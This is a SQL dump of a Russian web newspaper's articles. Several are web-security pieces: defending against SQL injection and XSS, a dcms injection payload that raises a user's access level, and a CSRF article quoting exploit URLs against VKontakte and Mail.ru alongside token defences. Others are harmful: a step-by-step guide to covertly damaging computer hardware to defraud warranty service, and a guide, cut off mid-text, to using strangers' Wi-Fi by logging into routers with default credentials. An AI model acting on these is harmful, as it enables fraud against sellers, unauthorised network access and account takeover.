есть<br />права и на удаление, и на<br />редактирование. Для разделов сайта,<br />требующих больших прав, например книга отзывов или форум стоит<br />завести отдельного пользователя, у<br />которого будет право на<br />редактирование только конкретной<br />таблицы. А для системы управления<br />сайтом необходимо завести отдельного пользователя базы<br />данных, т.к. ему необходимы полные<br />права.<br />Все описанные выше способы не<br />гарантируют стопроцентной защиты<br />от SQL-инъекций, однако, помогут предотвратить их в подавляющем<br />большинстве случаев.","Способы защиты от SQL-инъекций","gazeta/img_238102.png","1375061218","4");
INSERT INTO gazeta_article VALUES("143","21","Межсайтовый скриптинг (Cross site<br />scripting, XSS) — встраивание<br />нежелательного кода в html-код<br />страниц сайта. XSS можно условно<br />разделить на пассивную и активную<br />формы, которые мы рассмотрим ниже.<br />Пассивый XSS<br />Пассивный XSS основан на том, что<br />GET-параметры в ряде случаев<br />становятся частью текста страницы.<br />Например, мы имеем скрипт поиска search.php, содержащий следующий<br />код: <?php <br/>// начало скрипта <br/ >echo '<div>Вы искали: ' . $_GET<br />['query'] . '</div>'; <br/>//<br />продолжение скрипта, отображение<br />результатов поиска и.т.д <br/>?> Строк: 1 Мы видим, что страница содержит<br />заданный поисковой запрос. Если<br />злоумышленник обратимся к скрипту<br />следующим образом: search.php?<br />query=<a href="http:// example.com">my website</a> то на странице результатов поиска будет<br />присутствовать ссылка на<br />example.com. Затем злоумышленник<br />сообщит адрес такой страницы<br />результатов поисковым системам, и<br />они будут считать, что ваш сайт ссылкается на expample.com на одной<br />из своих страниц. Приведеный<br />пример используется<br />недобросовестными поисковыми<br />оптимизаторами для внешних ссылок<br />на свой сайт. В данном случае никакого взлома не происходит.<br />Пассивный XSS можно использовать и<br />для встраивания javascript-сценариев,<br />похищающих номера сессии,<br />использующиеся для авторизации.<br />Ограниченности пассивного XSS в том, что требуется передать<br />пользователю URL, содержащий<br />специально сформированные GET-<br />параметры. URL часто присылается<br />пользователю в спам-письме, или же<br />пользователь перенаправляется на данный URL с сайта, контролируемого<br />злоумышленником.<br />Активный XSS<br />Активный XSS работает на Web 2.0<br />сайтах, то есть на сайтах, содержимое<br />которых создают сами пользователи. Нежелательные скрипты<br />помещаются в сообщения на<br />форумах, профиль пользователя или<br />в личные сообщения. Например, в<br />2008 году на hаbгаhabr.ru получило<br />хождение личное сообщение, которое содержало скрипт,<br />отправляющий данное сообщение<br />друзьям пользователя от его имени.<br />Вредоносный javascript-сценарий<br />обычно передает злоумышленнику<br />номер сессии пользователя и информацию из его cookie, которая<br />позволяет получить контроль над<br />аккаунтом пользователя.<br />Другие виды XSS<br />Среди других видов XSS можно<br />отметить подмену кодировки в формируемом документе. Это<br />возможно при двух условиях:<br />1. пользовательская информация<br />попадает в тег <title> в<br />нефильтрованном виде (часто это<br />ник пользователя или его имя на странице профиля)<br />2. тег title находится в документе до<br />тегов meta, определяющих<br />кодировку<br />Более подробно можно прочитать<br />про виды XSS в Википедии. Требования к обработке внешних<br />параметров<br />Чтобы не допустить межсайтовый<br />скриптинг, следует внимательно<br />фильтровать все данные,<br />предоставляемые пользователем. Сформулируем ряд рекомендаций:<br />* Никогда не включайте параметры $<br />_GET, $_POST, $_COOKIE напрямую в<br />выдаваемый HTML. Если это текст,<br />имеет смысл обработать его с<br />помощью htmlspecialchars(), если атрибут alt для рисунка, то addslashes<br />(), если url — urlencode(). Если<br />пользователю разрешено<br />использовать некоторые теги,<br />протестируйте все варианты<br />использования, чтобы в невозможности встраивания<br />скриптов и вредоносного кода.<br />* Пользовательские данные — это не<br />только параметры $_GET, $_POST, $_<br />COOKIE. Информация в базе данных, а<br />также информация, полученная в результате обработки сторонних<br />сайтов также может быть<br />сформирована пользователем.<br />* Не допускайте возможности<br />загрузки произвольных файлов на<br />сервер. Пользователь в таком случае сможет загрузить вредоносные<br />скрипты и HTML-страницы.<br />Загруженные пользователем файлы<br />следует хранить в базе данных, а не в<br />файловой системе, и перед отдачей<br />пользователю проверять, что файл не будет исполняться браузером<br />(Content-Type не должен<br />соответствовать html, xml, и др.)<br />* Чем шире функциональные<br />возможности сайта, тем больше<br />возможностей XSS следует рассмотреть в целях обеспечения<br />безопасности сайта.","Способы защиты от XSS","gazeta/img_303545.png","1375061544","4");
INSERT INTO gazeta_article VALUES("144","22","Уязвимость-нефильтруемые, либо отфильтрованные<br />неверно данные, передающиеся в БД пользователем, либо<br />выводящиеся из БД в браузер.<br />=========<br />Местные мегокулкодеры изобрели уже 100500 велосипедов,<br />от ниипаццо всех видов уязвимостей, большая часть которых<br />вообще не имеет смысла, а те, которые хоть както работают,<br />содержат еще кучу подводных камней.<br />====<br />Начнем подажуй с sql. Инъекция проводится при подстановке<br />определенной комбинации символов в запрос.<br />Например рассмотрим статусы, давно всем известный скрипт,<br />через который сломали кучу сайтов, код там выгледел<br />примерно так:<br /><?php<br />mysql_query("UPDATE `user` SET `status`='".$_GET<br />['status']."' WHERE `id`='".$user['id']."'");<br />?><br />В идеале $_GET['status'] должен был содержать только цифры,<br />то есть урл выглядеть должен примерно так: http://site.dom/<br />status.php?status=1<br />Одноко стоит прописать урл так: http://site.dom/status.php?<br />status=1', `group_access`='15, мы получале в запросе<br />следующее:<br /><?php<br />mysql_query<br />("UPDATE `user` SET `status`='1', `group_access`='15' WHERE `id`='".<br />$user['id']."'");<br />?><br />Злоумышленник стал создателем.<br />В случае например с не менее известным "приветом", это<br />вбивали в форму ввода, запрос выглядел аналогично.<br />В случае со статусами, есть несколько способов:<br />1) Выводить целое число из поступивших данных, функцией<br />intval(), но в данном случае нам нужно только целое<br />положительное число, поэтому используем abc(intval()). В<br />случае, если целое число из данных извлечь невозможно,<br />вернется 0.<br />2) Проверять, из чего состоят данные, в данном случае нам<br />нужны только числа, фильтруем данные через is_numeric(),<br />примерно так:<br /><?php<br />if(is_numeric($_POST['status'])) //проводим запрос<br />else //выводим ошибку, если в поле обнаружены какие-<br />то еще символы.<br />?><br />В случае, если нам нужно передавать текст, то данные<br />функции категорически не подходят, куча народу решает<br />проблему запретом на ввод определенных символов,<br />действенно, но жутко неудобно, примером может служить<br />стандартная анкета dcms 664.<br />В случае с текстом используем функцию<br />mysql_real_escape_string(), функция экранирует все "опасные"<br />символы при записи, подставляя перед ними знак "\", тоесть "'"<br />превратится в "\' и т.д., после записи mysql самостоятельно<br />уберет все экранирующие символы.<br />В dcms серии 6xx для удобства функцмия сокращена, my_esc(),<br />так будет быстрее писать.<br />Все остальные способы, в частности запрет спец символов, в<br />99% случаев не нужны<br />В отличии от sql, xss срабатывает при выводе в браузер,<br />например, если пользователь забьет в БД такой текст:<br /><b>ololo</b>, выводя его без фильтрации вы получите на<br />выходе ololo, при чем пользователь ведь может подсунуть<br />вам не безобидный код, а например JS, который оперативно<br />пошлет ваши куки куда нужно, а дальше уже дело техники...<br />Обезопаситься элементарно, используем функцию<br />htmlspecialchars('$text'. 'END_QUOTES'. (...), она преобразует все<br />спец символы в html сущности (&=>&amp;, "=>&quot; и т.д.),<br />тоесть, html код не сработает, поскольку будет<br />восприниматься браузером как текст.<br />Причем часто функция используется без доп.параметров, это<br />не верно, при пропуске второго параметра кавычки<br />преобразоввываться не будут, возможно оставить уязвимость.<br />Ну и последний параметр, кодировка, желателен, для<br />снижения риска получения "сюрпризов" с текстом.<br />В случае с dcms серии 6xx функция встроена в output_text,<br />вместе со смайлами, бб кодами, в движке целесообразней<br />пользоваться именно ей.","Ломаем dcms","gazeta/img_777020.png","1375602295","4");
INSERT INTO gazeta_article VALUES("145","22","Существует множество причин, по которым кому то может понадобиться убить или ввести в состояние клинической смерти какую?либо компьютерную железку. <br />Наиболее часто такая потребность возникает, когда, к примеру, на работе «совершенно случайно» покупают новые компьютеры для секретарш с характеристиками, больше подходящими для хардкорного геймера. Утерю гарантии устроить не составит труда, а вот организовать списание железа бывает намного сложнее. Или, к примеру, хакер купил новую железку, не подумавши и не посмотрев обзоры в сети. Девайсина оказывается китайской поделкой, а обладатель испытывает стойкую потребность сдать ее обратно в магазин. Однако тут он натыкается на чудеса родной бюрократии и воистину гениальные трактовки закона о правах потребителя. Выясняется, что они полностью исключают возможность возврата технически исправного товара. Нередко оказывается, что покупатель сам согласился на эти невыгодные условия, подписав собственноручно свой приговор, именуемый гарантийным талоном. Именно в таких случаях ему может пригодиться умение грамотно убить железку, не оставив никаких следов преступления на теле потерпевшего. <br /><br /><br />Обратимые методы убийства <br />В некоторых случаях злоумышленник может подстраховать себя на случай, если железо, которое он хочет вернуть, имеет повреждения, лишающие его гарантии, но тем не менее кое?как работает. В данном случае он не хочет убивать девайс окончательно и бесповоротно, так как это чревато полным провалом операции. Тогда хакер рискует получить отказ от гарантии и невосстановимый девайс, который уже никому и не подкаким предлогом не удастся впарить. Убить железку так, чтобы ее можно было без проблем оживить, достаточно сложно. Дело в том, что злоумышленник должен обойти в этом деле мастеров из сервис-центра, иначе починят и вернут обратно. К счастью, в большинстве сервисных центров не занимаются ремонтом железа, а, ткнув пальцем в небо, делают заключение о браке или о поломке по вине пользователя и пишут соответствующую бумагу. Тем не менее, нужно учитывать возможность и другого расклада, когда девайс все же постараются починить. Инструментарий хакеру лучше всего иметь под рукой хороший и разнообразный инструмент. Он ведь помнит о том, что в большинстве случаев придется лезть внутрь девайса. Поэтому надо иметь огромное количество разных отверток всех видов и размеров. Отвертки под нестандартные винты также могут потребоваться. Часто используется спирт, пинцеты разных размеров и скальпель. Асы часто применяют паяльник, хороший недымящий флюс и термофен. <br />Винчестеры <br />Обратимые способы<br />Убить винчестер таким образом, чтобы восстановить его мог только сам хакер, можно лишь аппаратным способом. Конечно же, можно покрутить программную часть девайса, наделав софтовых бедблоков, или эмулировать жуткие тормоза, отключив все режимы работы, кроме PIO. Но все это быстро и качественно лечится в руках грамотного человека, поэтому рисковать не стоит. Самый верный способ заставить винт безбожно глюкать, стучать бошками и отказываться работать — это повреждение контактов между печатной платой и гермоблоком. В большинстве современных дисков соединение гермоблока с платой обеспечивается подпружиненными контактами, встроенными в саму банку, в то время как в соответствующем месте на печатной плате находятся контактные площадки, в которые эти зубчики упираются. Если нарушить в этом месте контакт одного или всех зубчиков с платой, то можно до- биться очень интересных спецэффектов и глюков. Злодею важно это сделать так, чтобы ничего при этом не было видно, даже если туда полезет сервисный инженер.Самый простой способ добиться этого заключается в нанесении на контакты печатной платы прозрачного, бесцветного лака, который послужит надежным изолятором,и в то же время не будет заметен. В некоторых моделях винчестеров до сих пор вместо контак тов используются тонкие шлейфики, вставляющиеся в разъем напечатной плате. В этом случае злоумышленник аккуратно вынимает шлейф из его разъема и покрывает контак ты все тем же лаком. Из данного способа автоматически вытекает обратный способ, на этот раз с токопроводящим лаком, которым в былые времена разлочивали множитель на процессорах Athlon. Тут все зависит от фантазии хакера. Основное правило, которым руководствуются техногики в данной ситуации, состоит в том, что ни в коем случае не стоит трогать силовые цепи, связанные с питанием винчестера, в противном случае можно переборщить и устроить красочное шоу с фейерверком. Контакты при этом мажут очень аккуратно, чтобы их потом можно было отмыть. Обычно любят замыкать слаботочные, но критически важные цепи, например, шины данных на модуле, кэш памяти или БИОСа. Некоторые любят поиздеваться и над процессором, но тут приходится действовать наобум — datasheet на него обычно найти сложно. С количеством лака стараются не перебарщивать, так как есть вероятность, что придется его отмывать.<br />Необратимые способы<br />Чтобы убить девайс окончательно и бесповоротно, хакер может применить несколько воистину кощунственных методик. Первая и самая надежная — это заворачивание харда в полотенце и отбивание у оного почек. Бьют обычно сильно, но аккуратно, чтобы не повредить внешний вид девайса. Избитый винт получит всевозможные смещения механики банки, благодаря чему он навсегда перестанет работать. Однако есть некоторая опасность, что внутри банки что?нибудь отва лится, и по гарантии его уж точно не примут, но данная вероятность минимальна. Второй способ заключается в уродовании электроники электричеством. Например, некоторые злодеи берут пьезо-элемент от зажигалки, цилиндрической стороной соединяют его контакт с массой (корпусом) винчестера и пропускают красивые электрические дуги в направлении любой выбранной микросхемы. Лучше всего для этого подходит чип кэш-памяти, процессор и БИОС. Хакер может залить токопроводящий лак под ножки микросхемы так, чтобы исключить какую?либо возможность его смыть. Если после всего этого девайс продолжит работать, злодею останется только возвестить окружающим о чуде. <br />CD / DVD привод <br />Обратимые способы <br />С дисковыми приводами дело обстоит совсем иначе. С одной стороны, может показаться, что вывести из строя CD-привод намного проще, однако это не всегда так. Суть проблемы заключается в отсутствии доступак электронике резака, ведь она всегда надежно упакована в корпус, защищающий девайс от пыли, а юзера — от шума. На первый взгляд может показаться, что не составляет никаких проблем открутить четыре винта и снять кожух, однако на практике все не так просто. Дело в том, что в большинстве фирм опечатывают корпуса таких девайсов гарантийными стикерами. Программно же можно только угробить девайс, выдернув его питалово в процессе перепрошивки, но восстановить после этого микропрограмму будет весьма проблематично. Злодеям остается лишь один путь:использовать ту часть платы, которая доступна для модификации, рядом с разъемами питания и интерфейса. Применяют обычно тот же токопроводящий лак. Есть вероятность замкнуть какие?нибудь важные магистрали привода. Также хакер может попробовать налить лак в IDE-разъем. Эффект, судя по всему, будет интереснейший. <br />Необратимые способы <br />Первый и самый эффективный способ — отключение питания девайса в момент перепрошивки. Как уже упоминалось, снять микросхему БИОСа с платы сидюка чаще всего весьма проблематично, так как в большинстве случаев она туда припаяна.Вследствие этого раскрыть заговор, то есть изобличить мошенника, практически невозможно. Для этого надо снять микросхему, подключить ее к программатору и проанализировать содержимое. Если даже кто?то этим займется, то это не будет доказательством преступления, так как слет прошивки мог произойти из?за каких?либо глюков электроники. Через открытый лоток можно изуродовать механику привода открывания лотка — например, залив в ось шестеренки клея, однако есть большая вероятность, что с такой неисправностью по гарантии хакера завернут сразу и не раздумывая. <br />Видеокарта <br />Обратимые способы <br />Существует огромное количество способов заставить видеокарту глючить и во всей красе демонстрировать целый букет неисправностей. Самый действенный способ — это эмулировать какую?нибудь классическую неисправность — например, оперативной памяти. В этом случае у злодея есть возможность пойти программным путем, разогнав видеокарту до таких значений, чтобы она еще кое?как функционировала, но уже глючила. Чтобы закрепить разгон, хакеру нужно прошить полученные значения в БИОС видюхи. Для этого он сливает с карты ее родной БИОС, подправляет одним из существующих редакторов и снова заливает на место. Как ты понимаешь, такой способ легко фиксится простой перепрошивкой, однако вряд ли с этим кто?то будет заморачиваться. Злодей может поступить проще: просто убить БИОС левой прошивкой или отключить питание компа в тот момент, когда флешер этого делать не рекомендует. Восстановить БИОС видеокарты потом можно и на ощупь или с участием второй видюхи. Для более надежной пакости злодей использует все тот же проводящий лак, щедро разрисовав им выводы одной из микросхем памяти. В результате этого на экране монитора будут красоваться различные спецэффекты в виде посторонних символов и полосок. <br />Необратимые способы <br />Тут открывается широкое поле для действий. Это первый обсуждаемый нами девайс, практически не имеющий защиты от внешних воздействий. Он, как правило, не обладает корпусом и содержит минимальное количество пластиковых частей. Это значит, что с помощью паяльника или термофена с него можно снять «лишние» запчасти. Для этого и нужен хороший флюс, так как хакер не имеет права оставить следы пайки и дать возможность злому сервисному инженеру завернуть девайс. Если ты когда?нибудь внимательно разглядывал видеокарту, то не мог не заметить, что она имеет громадное количество различных элементов. При этом зачастую далеко не все разведенные на плате места под элементы заняты деталями, поэтому отсутствие одного-единственного компонента будет незаметно, но девайс все равно работать откажется. Обычно снимают элементы, расположенные с обратной стороны платы, на том месте, где установлен процессор. Тем самым повышается вероятность того, что злодей снимет критически важную деталь, а не какой?нибудь фильтр. Также весьма чувствительна обвеска чипов оперативной памяти, после снятия которых данный чип пе рестанет корректно функционировать. Что-бы аккуратно удалить элемент, хакеру нужно сначала его прогреть паяльником или термофеном, а потом аккуратно потянуть пинцетом. После этого злодею нужно обязательно облагородить место вмешательства. Для этого поверхность смазывается флюсом и прогревается, в результате чего контактные площадки будут выглядеть так, будто там ничего и не было. Останется только смыть спиртом флюс. Неплохо срабатывает и способ с пьезо-элементом, но оперативная память таких вещей не любит. И, наконец, самый простой способ — отключить охлаждение видеокарты и помучить ее в таком состоянии. Правда, этот метод самый непредсказуемый — может сдохнуть процессор, а может, подгорит печатная плата, и в гарантию ее, естественно, не возьмут. <br />Звук<br />Обратимые способы<br />Со звуковыми картами дела обстоят так же, как и с видео. Не все знают, что подавляющее число звуковух имеют собственный программируемый БИОС, который также злоумышленник может убить, только восстановить его бывает не так просто. Поэтому обычно применяют фантазию и немного лака.<br />Необратимые способы <br />Злодей может попробовать сжечь процессор звуковой карты, резко подав на линейный или микрофонный входы мощный, сигнал — в прошлом так была сожжена ни одна звуковушка. При этом, как правило, повреждается не только сам вход, но и цепи, ответственные за выход, но, как к этому отнесутся в сервисном центре, остается только догадываться. <br />Материнская плата<br />Обратимые способы<br />С мамкой хакер может делать все, что душе угодно, не особо боясь потерять гарантию. Причина проста до безобразия. Осмотреть всю печатную плату на предмет микроповреждений, отсутствия деталей и прочих хитрых модификаций очень сложно из?за ее больших размеров. Конечно же, платы осматривают, но не под микроскопом и без каталога находящихся на ней элементов. На это способны только некоторые некрофилы с Митинского рынка и аналогичные деятели из мелких компьютерных фирм, которые теряют на этом свои деньги. В большинстве крупных фирм на это просто нет времени. Поэтому если на плате отсутствуют явные механические повреждения, то злодей может смело сдавать ее в гарантию. Програм- мно убить мать таким образом, чтобы можно было «откатить» неисправность, очень сложно. Порчей БИОСа тут не обойдется, так как это элементарно фиксится. Остается только токопроводящий лак. Его обычно наносят около жизненно важных узлов, например, возле БИОСа, тактовых генераторов, а также на нераспаянные участки платы. Безусловно, самым надежным и менее палевным способом является снятие некоторых элементов, но этот способ является обратимым только с оговоркой на хорошее паяльное оборудование и прямые руки, ведь поставить CMD-элемент на место намного сложнее, чем его снять. <br />Необратимые способы<br />Из необратимых стоит выделить только демонтаж важных деталей, необходимых для работы платы. Лучше всего подходят различные кварцевые генераторы и элементы, стоящие на внутренней шине между мостами. Их отсутствие обеспечит полную неработоспособность платы. Впрочем, пьезоэлектрошок тоже подойдет. Чтобы избежать излишней подозрительности, злодей может попробовать убить какую?либо отдельно взятую часть — например, контроллер оперативной памяти. Эта поломка будет выглядеть значительно правдоподобнее — плата просто будет орать благим матом, требуя вставить оперативную память. Ведь полная смерть у матерей наступает не так часто. <br />Периферия<br />С убийством периферии все зависит отконкретной ситуации. Например, многие принтеры и большинство ЭЛТ-мониторов имеют специальные сервисные режимы, из?за которых можно изуродовать девайс. В мониторах при помощи этих режимов<br />злодей может так исковеркать изображение, что вернуть исходные настройки будет практически невозможно. Эти настройки делаются на заводе при участии сложного оборудования, в домашних условиях, да и в условиях мелкого сервис-центра этого не исправить. Вход в это меню выполняется путем нажатия определенной комбинации кнопок, но для всех мониторов она разная. На некоторых мониторах, например Sony, ее вообще нет, и вход в сервисное меню выполняется через специальный data?кабель с компьютера. С принтерами ситуация похожая, однако в бытовых дешевых принтерах подобные функции присутствуют редко, в основном это возможно на дорогих производительных моделях, предназначенных для офисов. То же самое относится и к другим девайсам, например к аппаратным dial up модемам. В них все настройки хранятся в памяти модема, с их помощью его можно привести в полностью неработоспособное состояние. Дело в том, что их настройки позволяют полностью изменить реакцию на линию связи, в определенных ситуациях модем просто перестанет видеть линию. Однако лечится это обычным возвратом к заводским настройкам.<br />Выводы<br />Как видишь, злодей может без проблем угробить любой девайс. Большинство современных девайсов имеют свои внутренние микропрограммы, и если хорошо изучить подробности их конфигурирования и работы, то можно успешно эмулировать многие неисправности. Не стоит забывать, что в сервис-центрах также сидят грамотные люди, которых порой не так просто обдурить.<br />","Как грамотно убить компьютер","journal_images/img_988713.png","1377068354","4");
INSERT INTO gazeta_article VALUES("146","22","На дворе вот уже более месяца стоит плохая, дождливая погода. И нет ничего лучше, как провести это скучное время за чтением свежего номера своей любимой газеты. А о чем же сегодня будем читать?? В прошлых номерах КГ аналитики SASecurity gr. рассматривали самые разнообразные уязвимости Интернет ресурсов, такие как XSS, SQL-inj, drive-by атаки, man-in-the-middle и так далее. В этой статье я продолжу рассказ, а говорить буду об CSRF атаке. А начнем мы, как обычно, с истории <br /><br />Как оно было<br /><br />Впервые о данном типе уязвимости заговорили в далеком 1988 году, когда Norm Hardy опубликовал документ под заголовком “The confused Deputy: (or why capabilities might have been invented)”, объясняющий подозрительное доверие веб-приложений к принимаемым данным, назвав это явление, как видно из названия заметки, «confused deputy». На практике примеры реализации атак подобного рода были приведены в bugtruck только в 2000, когда Jim Fulton написал статью “Client Side Trojan” на сайте zope.org. Сам термин “CSRF ” был введен Питером Ваткинсоном в 2001 году, он использовался в его заметке под названием «The Dangers of Allowing Users to Post Images». Почитать оригинальную статью можно по адресу http://www.tux.org/~peterw/csrf.txt , правда, это можно сделать только владея английским языком. Новая на то время уязвимость получила название Cross-Site Request Forgery (сокращенно CSRF или XSRF), что в переводе на русский означает «подделка межсайтовых запросов». Если Вы где-нибудь увидите фразы типа «Session Riding» или «Confused Deputy Attack», не пугайтесь – это всего лишь еще несколько вариантов именования уязвимостей данного класса. Довольно опасным оказался взлом почтового сервиса Gmail в январе 2007. С помощью XSRF атаки можно было украсть контактный список любого пользователя. А теперь представьте, скольким людям можно было разослать спам или вредоносное ПО! В 2008 году подобная уязвимость была обнаружена на сайте New York Times, в конце этого же года на сайте YouTube. Если же говорить простым и понятным всем языком, то CSRF – это вид атак на посетителей веб-сайтов, использующие недостатки протокола HTTP. Возьмем самый простой пример: жертва посещает сайт, созданный злоумышленником, и от ее лица скрытно отправляется запрос на другой сервер. В реальной жизни чаще всего это какие-нибудь платежные системы. В результате такого запроса может быть осуществлена скрытая транзакция ну или то-то в этом дехе. Для осуществления данной атаки, жертва должна быть авторизована на том сервере, на который отправляется запрос, и этот запрос не должен требовать какого-либо подтверждения со стороны пользователя, который не может быть проигнорирован или подделан атакующим скриптом. Многие ошибочно считают, что данный тип уязвимости тесно связан с Cross-Site Scripting атакой, но это лишь распространенное заблуждение. Единственное, в чем схожи CSRF и XSS, так это использование в качестве вектора атаки клиентов Web-приложений (так называемая Client-Side Attack). В реальной жизни CSRF атака может эксплуатироваться как совместно с XSS, так и без нее – все же она представляет собой отдельный класс уязвимостей. Хотя вместе они дают более насыщенный функционал для злоумышленника.<br /><br />Зачем оно надо и как это организовать?<br /><br />Одно из применений XSRF — эксплуатация пассивных XSS, обнаруженных на другом сервере. Так же возможны отправка спама от лица жертвы и изменение каких-либо настроек учётных записей на других сайтах (например, секретного вопроса для восстановления пароля или альтернативного e-mail). Достаточно вспомнить обнаруженный в 2008 году баг на чрезвычайно популярном российском ресурсе ВКонтакте. Используя CRSF атаку можно было подменить в любом профиле поле «Веб-сайт». Делалось это с использование скрипта, код которого можно увидеть на рисунке 1:<br /><br /><br /><br />Если внимательно пересмотреть данный код, то можно заметить, что при запросе картинки по адресу http://vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com, браузер попытается обратиться к этому URL, в результате чего он непреднамеренно сменит в анкете значение поля «Веб-сайт» на «http://tvoydohod.com» (смотрим рисунок 2).<br /><br /><br /><br />И так можно было сменить и другие поля. Вторым примером CSRF атаки является давно известная (и уже устраненная админами) CSRF уязвимость на первом почтовом сервисе России Mail.ru, датированная приблизительно 2004 годом. Дыра заключалась в следующем: хакер, будь то злоумышленник или простой пользователь, жаждущий почитать чужую почту, создает специальную web-страничку и размещает ее на каком-нибудь хостинге. Далее он создает письмо, где просит пользователя перейти по ссылке, ведущей на эту страничку, и отсылает его жертве. Последняя, в свою очередь, прочитав почту наивно переходит по ссылке. В это время скрытый в недрах HTML тегов скрипт осуществляет подмену альтернативного e-mail на указанный взломщиком. Эти данные передавались на URL http://win.mail.ru/cgi-bin/anketa методом POST. Код скрипта формы указан на рисунке 3:<br /><br /><br /><br />Вторым способом смены альтернативного мыла на этом же сервисе является переход жертвы по ссылке, имеющей вид http://win.mail.ru/cgi-bin/anketa?page=2&Email=test@sa-sec.org. Здесь идет эксплуатация метода GET, где в качестве параметра переменной Email указывается любой почтовый адрес (в нашем случае это test@sa-sec.org). А использовать этот способ можно так же, как и на сайте ВКонтакте. В этом и ранее указанном случаях злоумышленник может получить доступ к почтовому ящику пользователя, просто запросив пасс на страничке восстановления забытого пароля, указав в качестве дополнительного e-mail адрес test@sa-sec.org.<br /><br />Вообще данный тип уязвимости тем и интересен, что он не является результатом ошибок программистов, а является нормальным поведением Web-сервера и браузера. Поэтому ее довольно сложно обнаружить, но защититься все же можно. Как?? Читаем дальше.<br /><br />Организация защиты<br /><br />Почему-то многие люди считают, что использование метода POST вместо GET поможет защитить веб-приложение от атак подобного рода, но приведенный мною выше пример получения доступа к мылу в пух и прах развевает это распространенное заблуждение. Второй способ – это реализация страниц подтверждения. На самом деле данный способ лишь немного затрудняет осуществление атаки тем, что необходимо делать два запроса вместо одного. Для качественной защиты от данного типа атак, веб-сайты должны требовать подтверждения большинства действий пользователя и проверять поле HTTP referer, если оно указано в запросе.<br /><br />Лучше всего использовать случайный идентификатор, именуемый маркером доступа (token), который генерируется для каждой операции и необходим для ее выполнения. Он помогает эффективно различать запросы, что защищает сайт от CSRF-атак. Код генерации (пишем его, естественно, на PHP) такого маркера выглядит примерно следующим образом:<br /><br /><br />PHP код:<br /><?php <br />$token = md5(uniqid(mt_rand() . microtime())); <br />$_SESSION['token'] = $token; <br />?> <br /><br /><br />Случайный маркер в нашем случае создается на основе MD5 хешировании метки времени (функция microtime) и случайного числа (функция mt_rand), после чего записывается в массив $_SESSION. Далее в каждой форме на сайте добавляем hidden-поле с идентификатором:<br /><br /><br />PHP код:<br /><input name="token" type="hidden" value="<?php echo $token ?>"/> <br /><br /><br /><br />После чего в каждом запросе необходимо проверять корректность маркера доступа:<br /><br /><br />PHP код:<br /><?php <br />$token = $_POST['token']; <br />if ($_SESSION['token'] == $token) { <br />$_SESSION['token'] = ''; <br />/* Выполняем требуемые операции */ <br />} else { <br />die("404 Not Found!"); <br />} <br />?> <br /><br />Анализируя код, мы видим, что изначально в переменную $token записывается значение маркера доступа. Далее идет сравнение его с оригиналом и в случае совпадения выполнение требуемых действий. Если же наш токен оказался неверным (видимо CSRF атака), то прекращаем выполнение сценария и выдаем ошибку (функция die). Данный метод очень прост в реализации, но очень эффективен для защиты. Еще одним необходимым действием, которое необходимо провести, это хорошенько проверить сайт на наличие XSS уязвимостей, ведь как я говорил ранее, связка этих двух компонентов вполне реальна и довольна эффективна.<br /><br />Насколько велика угроза?<br /><br />Данные, полученные компанией Positive Technologies (я думаю, ее много кто знает хотя бы по программе XSpider) в ходе работ по тестированию на проникновение и оценки защищенности Web-приложений, показывают, что этой уязвимости подвержена большая часть Web-приложений. А что это может означать? То, что большая часть форумов, почтовых сервисов и подобных ресурсов не в состоянии удержать наши конфиденциальные данные от злоумышленников. Поэтому будьте бдительны, и если будете создавать свой сайт, не поленитесь защитить себя от XSRF атак, ведь это не сложно <br /><br />P.S.: Информация предоставлена исключительно для ознакомления и изучения. Автор и SASecurity gr. не несут ответственности за использование данной информации в злонамеренных целях.<br />","Найти и обезвредить: CSRF-атака<br />","journal_images/img_780487.png","1377068399","4");
INSERT INTO gazeta_article VALUES("147","22","Сегодня я расскажу Вам несколько способов как можно бесплатно посидеть в интернете через WI-FI с компьютера или ноутбука.<br />Итак, начнем. Что мы имеем?<br />1) Компьютер с платой WI-FI или USB WIFI адаптер<br />2) Дом неподключенный к проводному интернету (или какие либо другие проблемы отсутствия проводного интернета, такие как дырка в кошельке, отсутствие роутера или сетевой карты и т.д.).<br />3) Желание сидеть в интернете находясь в автомобиле или просто на улице.<br /><br /><br />Способ №1:<br /><br />Ставим ноутбук (компьютер с адаптером) поближе к окну. Заходим в беспроводные подключения на компьютере (не забудьте убедиться что WI-FI адаптер включен и работает корректно). Должны отобразиться беспроводные сети которые "видит" ваш адаптер. Если на сети стоит замок и написано что-то похожее на WPA или WEP - можно смело пропускать эту сеть. Предположим что у вас доступна сеть "Free WIFI"(или что то подобное) можно просто подключиться к ней и все. Дальше вам требуется немного подождать пока удаленная точка доступа выдаст вам правильные настройки и Вы можете начинать покорять просторы интернета. Если у вас нет в списке точек доступа со словами "Free", "besplatno","halyava", но есть точки без замка с названиями "vasya", "router", "WLAN" и т.д. то с ними в основном есть пару проблем: эта точка доступа может не давать автоматом настройки. Либо же это обычная домашняя точка доступа "без интернета". Будем надеяться что это все таки первый вариант, то есть точка, которая не дает автоматом настройки. Пробуем к ней подключиться. Если в итоге процесс застревает на надписи "Получение сетевого адреса" то наши ожидания правильны, точка не может сама дать верные настройки. Что же будем сами настраивать. Заходим в сетевые подключения: Пуск-->Подключение-->отобразить Все подключения, жмем правой кнопкой по беспроводному соединению-->свойства и на первой вкладке дважды кликаем на "Протокол Интернета (TCP/IP)". В открывшемся окошке выбираем "Использовать следующий IP-адрес" и вписываем значения. IP адрес вводим 192.168.1.123 (число 123 можно менять в диапазоне от 2 до 255), далее жмем на "Маску подсети", она должна назначаться автоматически в виде 255.255.255.0 и наконец "Основной шлюз". Так как в 90 % случаев адрес у точки 192.168.1.1, то будем отталкиваться от этой теории и ставим шлюз 192.168.1.1. К DNS мы еще вернемся. Нажимаем ОК, еще раз ОК. Пробуем заново подключиться к той точке, что уже пытались ранее. Если все настроено правильно - будет написано, что беспроводная сеть подключена. Значит мы соединились с точкой успешно. Теперь нам нужен сам интернет, но пока мы незнаем DNS адреса, то интернета нам не видать. Открываем интернет браузер и в адресе вводим "192.168.1.1" (без кавычек и всяких http://). У нас должно выскочить окошко с запросом логина и пароля. Опять же по теории вводим в оба окна слово "admin" (без кавычек). Если все верно, то откроется страница точки доступа. Если точка вас не пускает, то забиваем на эту точку и пробуем подключиться к следующей. Предположим, что Вам все-таки удалось зайти на страничку точки доступа. “Что нам отсюда надо?” - спросите Вы. Нам нужно отсюда узнать DNS адреса. Ищем на страничке "Status" и нажимаем на него. Откроется статус подключения у точки доступа. Там будет много статистики и слов типа: IP adress, netmask, gate, Primary DNS, Secondary DNS. Из всего этого нам нужно только Primary DNS, Secondary DNS. 